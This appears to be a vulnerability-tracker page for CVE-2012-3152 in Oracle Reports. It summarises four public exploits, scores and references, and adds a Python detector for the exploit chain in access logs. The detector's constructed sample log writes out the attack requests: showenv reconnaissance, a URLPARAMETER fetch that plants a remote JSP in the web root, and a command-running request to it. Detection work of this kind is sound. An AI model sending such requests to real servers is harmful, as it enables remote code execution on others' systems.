CVE-2012-3152

CRITICAL · KEV

Oracle Reports Developer - Info Disclosure


Exploitation Summary

CVE-2012-3152 is actively exploited and is listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added November 3, 2021. EIP tracks 4 public exploits from Metasploit, Mekanismen and abq0, among them the Metasploit module exploits/multi/http/oracle_reports_rce.

AI-analyzed exploit summary: This Metasploit module exploits CVE-2012-3152 and CVE-2012-3153 in Oracle Forms and Reports to achieve remote code execution by leveraging path disclosure and arbitrary file write vulnerabilities. It uploads a JSP payload to the target system and executes it.

Description

Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the URLPARAMETER functionality allows remote attackers to read and upload arbitrary files to reports/rwservlet, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3153 to execute arbitrary code by uploading a .jsp file.

Exploits (4)

exploitdb WORKING POC VERIFIED
by Metasploit · ruby · remote · windows
https://www.exploit-db.com/exploits/31737

This Metasploit module exploits CVE-2012-3152 and CVE-2012-3153 in Oracle Forms and Reports to achieve remote code execution by leveraging path disclosure and arbitrary file write vulnerabilities. It uploads a JSP payload to the target system and executes it.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle Forms and Reports 10.1
No auth needed
Prerequisites: Network access to the target Oracle Forms and Reports server · Target server must be vulnerable to CVE-2012-3152 and CVE-2012-3153
devstral-2 · analyzed Feb 16, 2026
exploitdb WORKING POC
by Mekanismen · ruby · remote · jsp
https://www.exploit-db.com/exploits/31253

This Ruby script automates the exploitation of CVE-2012-3152 and CVE-2012-3153 in Oracle Reports 11.1 by uploading a malicious JSP payload to a vulnerable server. It enumerates keymaps, extracts server credentials, and leverages the 'showenv' endpoint to determine the local path for payload deployment.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle Reports 11.1
No auth needed
Prerequisites: Access to the target Oracle Reports server · A hosted JSP payload URL
devstral-2 · analyzed Feb 18, 2026
nomisec SCANNER 2 stars
by abq0 · poc
https://github.com/abq0/rwsploit

This repository contains a Python-based scanner for detecting and testing vulnerabilities in Oracle Reports Server (rwservlet) related to CVE-2012-3152 and CVE-2012-3153. It includes functionality for LFI (Local File Inclusion), SSRF (Server-Side Request Forgery), and shell upload testing, but does not contain a full exploit PoC for achieving remote code execution.

Classification
Scanner 95%
Attack Type
Info Leak | Ssrf
Complexity
Moderate
Reliability
Reliable
Target: Oracle Reports Server (rwservlet) < v11
No auth needed
Prerequisites: Network access to the target Oracle Reports Server · Python 3.8+ environment
devstral-2 · analyzed May 19, 2026
metasploit WORKING POC GREAT
ruby · poc · linux
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/oracle_reports_rce.rb

This Metasploit module exploits CVE-2012-3152 and CVE-2012-3153 in Oracle Forms and Reports to achieve remote code execution by chaining a path disclosure with an arbitrary file write. It first discloses server paths via the 'showenv' endpoint, then uploads a malicious JSP payload to a writable directory under the web root, and finally requests the JSP to execute it.

Classification
Working Poc 100%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle Forms and Reports 10.1
No auth needed
Prerequisites: Network access to the Oracle Reports server · The target must have Oracle Forms and Reports 10.1 installed
devstral-2 · analyzed Apr 30, 2026
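The three exploit write-ups above and the Description all describe the same chain on reports/rwservlet: a showenv request to learn server paths, a URLPARAMETER request that makes the Reports Server fetch and write a .jsp, and then a request for that .jsp. The detection below, added here as an example and not code from EIP, Metasploit, Mekanismen or the rwsploit repository, runs those indicators over access-log lines and correlates the upload with the later execution per client. The log lines are constructed, not real traffic; showmap (the rwservlet keymap listing command, standing in for the "enumerates keymaps" step) and the desname/destype/JOBTYPE parameter names in the sample request are assumed from the Oracle Reports servlet interface, not taken from this page.

```python
"""Access-log detection for the CVE-2012-3152 / CVE-2012-3153 exploit chain.

Added example (not the page's or any project's own code). Assumes Combined
Log Format lines; the sample log below is constructed for the demonstration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

RWSERVLET = "/reports/rwservlet"

# Combined Log Format: client, ident, user, [timestamp], "METHOD URI PROTO", status, size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one client walks the full chain, a second runs a normal report.
# desname/destype/JOBTYPE=rwurl are assumed rwservlet parameter names (not from the page).
SAMPLE_LOG = """\
203.0.113.5 - - [03/Nov/2021:10:00:01 +0000] "GET /reports/rwservlet/showenv HTTP/1.1" 200 4123 "-" "python-requests/2.25"
203.0.113.5 - - [03/Nov/2021:10:00:02 +0000] "GET /reports/rwservlet?server=rep_x&report=test.rdf&desformat=html&destype=file&desname=/u01/app/oracle/reports/x.jsp&JOBTYPE=rwurl&URLPARAMETER=http://203.0.113.5/x.jsp HTTP/1.1" 200 512 "-" "python-requests/2.25"
203.0.113.5 - - [03/Nov/2021:10:00:03 +0000] "GET /reports/x.jsp?cmd=id HTTP/1.1" 200 89 "-" "python-requests/2.25"
198.51.100.7 - - [03/Nov/2021:10:05:00 +0000] "GET /reports/rwservlet?report=sales.rdf&desformat=pdf HTTP/1.1" 200 20481 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one log line into a dict; query keys are lower-cased, values URL-decoded."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("uri"))
    query = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "uri": m.group("uri"),
        "path": unquote(parts.path),
        "query": query,
        "status": int(m.group("status")),
    }


def _jsp_names(query):
    """Basenames of every .jsp value in a query string (upload target or fetched payload)."""
    return {v.rsplit("/", 1)[-1].lower()
            for vals in query.values() for v in vals if v.lower().endswith(".jsp")}


def classify(rec):
    """Return the indicator tags for one parsed rwservlet request (empty list if benign)."""
    tags = []
    path = rec["path"].lower()
    q = rec["query"]
    if path.startswith(RWSERVLET):
        # showenv dumps the server environment: the path disclosure every exploit starts with
        if path.endswith("/showenv") or "showenv" in q:
            tags.append("recon:showenv")
        # showmap lists keymaps (assumed command name for the keymap enumeration step)
        if path.endswith("/showmap") or "showmap" in q:
            tags.append("recon:showmap")
        # URLPARAMETER makes the Reports Server read a URL/file: the read/upload primitive
        if "urlparameter" in q:
            tags.append("fetch:URLPARAMETER")
            # a .jsp anywhere in that request means the write is being aimed at a web shell
            if _jsp_names(q):
                tags.append("write:jsp")
    return tags


def detect(lines):
    """Run the indicators over log lines and correlate JSP write -> JSP execution per client."""
    alerts = []
    staged = {}  # ip -> set of .jsp basenames that client tried to write via rwservlet
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if "write:jsp" in tags:
            staged.setdefault(rec["ip"], set()).update(_jsp_names(rec["query"]))
        else:
            basename = rec["path"].rsplit("/", 1)[-1].lower()
            # a later hit on a .jsp this client previously named in a URLPARAMETER request
            if basename.endswith(".jsp") and basename in staged.get(rec["ip"], set()):
                tags.append("exec:uploaded-jsp")
        if tags:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "uri": rec["uri"],
                           "status": rec["status"], "tags": tags})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(a["ts"], a["ip"], a["status"], ",".join(a["tags"]), a["uri"])
```

A single recon:showenv hit is low-confidence on its own (scanners probe it constantly); the sequence recon → fetch:URLPARAMETER with write:jsp → exec:uploaded-jsp from one client, with a 200 on the final request, is what should page someone. Keying the correlation on the .jsp basename rather than the full desname path keeps it working when the attacker writes to one directory but requests the file through a different virtual path.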

References (12)

Exploit, Third Party Advisory, VDB Entry (exploit-db): http://www.exploit-db.com/exploits/31253
Broken Link, VDB Entry (OSVDB 86394): http://www.osvdb.org/86394
Broken Link, Third Party Advisory, VDB Entry (BID 55955): http://www.securityfocus.com/bid/55955
Broken Link, VDB Entry (OSVDB 86395): http://www.osvdb.org/86395
Mailing List, Third Party Advisory (Full Disclosure): http://seclists.org/fulldisclosure/2014/Jan/186
Third Party Advisory, VDB Entry (IBM X-Force 79295): https://exchange.xforce.ibmcloud.com/vulnerabilities/79295
Broken Link, Vendor Advisory (Mandriva MDVSA-2013:150): http://www.mandriva.com/security/advisories?name=MDVSA-2013:150

Scores

CVSS v3.1 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
EPSS 0.9354
EPSS Percentile 99.8%
Attack Vector NETWORK

CISA SSVC

Vulnrichment
Exploitation active
Automatable yes
Technical Impact total

Details

CISA KEV 2021-11-03
VulnCheck KEV 2021-01-01
InTheWild.io 2021-07-23
ENISA EUVD EUVD-2012-3130
Status published
Products (3)
oracle/fusion_middleware 11.1.1.4.0
oracle/fusion_middleware 11.1.1.6.0
oracle/fusion_middleware 11.1.2.0
Published Oct 16, 2012
KEV Added Nov 03, 2021
Tracked Since Feb 18, 2026